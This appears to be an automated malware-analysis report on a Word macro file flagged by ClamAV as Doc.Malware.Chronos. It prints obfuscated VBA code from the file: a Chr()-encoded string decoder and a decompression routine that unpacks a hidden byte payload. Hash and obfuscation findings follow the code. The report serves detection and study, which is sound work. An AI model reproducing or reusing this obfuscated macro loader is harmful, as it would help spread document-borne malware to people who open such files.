ActiveDocument.Range.Text = IqAGSLPUAJG(Chr(160) + Chr(57) + Chr(39) + Chr(10) + Chr(229) + Chr(100) + Chr(122) + Chr(174) + Chr(39) + Chr(208) + Chr(103) + Chr(51) + Chr(13) + Chr(233) + Chr(39) + Chr(11) + Chr(119) + Chr(161) + Chr(3) + Chr(216) + Chr(51) + Chr(108) + Chr(187) + Chr(48) + Chr(227) + Chr(187) + Chr(150) + Chr(253) + Chr(154) + Chr(208) + Chr(222) + Chr(111) + Chr(156) + Chr(30) + Chr(170) + Chr(13) + Chr(35) + Chr(28) + Chr(78) + Chr(168) + Chr(11) + Chr(231) + Chr(120) + Chr(199) + Chr(200) + Chr(168) + Chr(113) + Chr(71) + Chr(228) + Chr(119) + Chr(91) + Chr(43) + Chr(185) + Chr(190) + Chr(95) + Chr(205) + Chr(159) + Chr(110) + Chr(79) + Chr(17) + Chr(30) + Chr(127) + Chr(113) + Chr(251) + Chr(243) + Chr(61) + Chr(134) + Chr(143) + Chr(52) + Chr(172) + Chr(118), "MnVQz4OjUS")
End If
Dim VbtNVJJPmm As Long, YNXWc8Swl As Long
VbtNVJJPmm = 16
YNXWc8Swl = 47
If VbtNVJJPmm + YNXWc8Swl > 4 Then
YNXWc8Swl = VbtNVJJPmm + 27
Else
MsgBox 33
End If
End Sub
Private Sub U4j0Mutcw(IbIZc4MDUIW5() As Byte, M1Ml0uRV0i As Long)
Dim RHz39AqVIzU7yg As Long, W61R5 As Long, H7aK As Byte, BkedkgiyKUZ4u4Smm As Long, Nl4DWWC9qyeKJpT As Integer, NVUaE As Byte, XekBgxC2kS90j8tb() As Byte, Ys77QvqqoN1 As Integer
Dim Ennhv As Long, CKUS2WBcJfv6t As Byte, YGpuGcg2I4kd As Long, OL5rIjPqlH As Long, VqRbjEvtgBC1fKk As Long, AsWQpCZRTgZ(0 To 7) As Byte, K0XNnEawS6lMTQx(0 To 511) As HnF3nxQRcws6HMjP, IAmHO3mQ(0 To 255) As UP6g2cwz9
BkedkgiyKUZ4u4Smm = 1
NVUaE = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
XtJgfXpzM0o 4, VarPtr(YGpuGcg2I4kd), VarPtr(IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1))
BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 4
VqRbjEvtgBC1fKk = YGpuGcg2I4kd
If (YGpuGcg2I4kd = 0) Then Exit Sub
ReDim XekBgxC2kS90j8tb(0 To YGpuGcg2I4kd - 1)
XtJgfXpzM0o 2, VarPtr(Nl4DWWC9qyeKJpT), VarPtr(IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1))
BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 2
For RHz39AqVIzU7yg = 1 To Nl4DWWC9qyeKJpT
With IAmHO3mQ(IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1))
BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
.Jyq7kWxLEuXU = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
ReDim .Psfw7jyizqX2pBr(0 To .Jyq7kWxLEuXU - 1)
End With
Next
AsWQpCZRTgZ(0) = 2 ^ 0
AsWQpCZRTgZ(1) = 2 ^ 1
AsWQpCZRTgZ(2) = 2 ^ 2
AsWQpCZRTgZ(3) = 2 ^ 3
AsWQpCZRTgZ(4) = 2 ^ 4
AsWQpCZRTgZ(5) = 2 ^ 5
AsWQpCZRTgZ(6) = 2 ^ 6
AsWQpCZRTgZ(7) = 2 ^ 7
CKUS2WBcJfv6t = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
Ys77QvqqoN1 = 0
For RHz39AqVIzU7yg = 0 To 255
With IAmHO3mQ(RHz39AqVIzU7yg)
If (.Jyq7kWxLEuXU > 0) Then
For W61R5 = 0 To (.Jyq7kWxLEuXU - 1)
If (CKUS2WBcJfv6t And AsWQpCZRTgZ(Ys77QvqqoN1)) Then .Psfw7jyizqX2pBr(W61R5) = 1
Ys77QvqqoN1 = Ys77QvqqoN1 + 1
If (Ys77QvqqoN1 = 8) Then
CKUS2WBcJfv6t = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm + 1
Ys77QvqqoN1 = 0
End If
Next
End If
End With
Next
If (Ys77QvqqoN1 = 0) Then BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm - 1
OL5rIjPqlH = 1
K0XNnEawS6lMTQx(0).O2jX1pn7C = -1
K0XNnEawS6lMTQx(0).Qoey8CXRBAw3 = -1
K0XNnEawS6lMTQx(0).UVv = -1
K0XNnEawS6lMTQx(0).SNovaUJISNL = -1
For RHz39AqVIzU7yg = 0 To 255
GuQHe80AnN K0XNnEawS6lMTQx(), OL5rIjPqlH, RHz39AqVIzU7yg, IAmHO3mQ(RHz39AqVIzU7yg)
Next
YGpuGcg2I4kd = 0
For BkedkgiyKUZ4u4Smm = BkedkgiyKUZ4u4Smm To M1Ml0uRV0i
CKUS2WBcJfv6t = IbIZc4MDUIW5(BkedkgiyKUZ4u4Smm - 1)
For Ys77QvqqoN1 = 0 To 7
If (CKUS2WBcJfv6t And AsWQpCZRTgZ(Ys77QvqqoN1)) Then Ennhv = K0XNnEawS6lMTQx(Ennhv).Qoey8CXRBAw3 Else Ennhv = K0XNnEawS6lMTQx(Ennhv).O2jX1pn7C
If (K0XNnEawS6lMTQx(Ennhv).SNovaUJISNL > -1) Then
XekBgxC2kS90j8tb(YGpuGcg2I4kd) = K0XNnEawS6lMTQx(Ennhv).SNovaUJISNL
YGpuGcg2I4kd = YGpuGcg2I4kd + 1
If (YGpuGcg2I4kd = VqRbjEvtgBC1fKk) Then GoTo VqRbjEvtgBC1fKk
Ennhv = 0
End If
Next
Next
VqRbjEvtgBC1fKk:
H7aK = 0
For RHz39AqVIzU7yg = 0 To (YGpuGcg2I4kd - 1)
H7aK = H7aK Xor XekBgxC2kS90j8tb(RHz39AqVIzU7yg)
Next
ReDim IbIZc4MDUIW5(0 To YGpuGcg2I4kd - 1)
XtJgfXpzM0o YGpuGcg2I4kd, VarPtr(IbIZc4MDUIW5(0)), VarPtr(XekBgxC2kS90j8tb(0))
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 52736 bytes
SHA-256: ad30cec5403b32e8cafacb7dfa038e15e53f6a282cf554eff23f836c552880e4
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: likely
311 of 622 identifiers look randomly generated (e.g. 'E0CD1E5D1FDDB01DB01DB01DB01') — consistent with name-mangling obfuscation.

Open this report in the interactive analyzer, or submit your own file for analysis.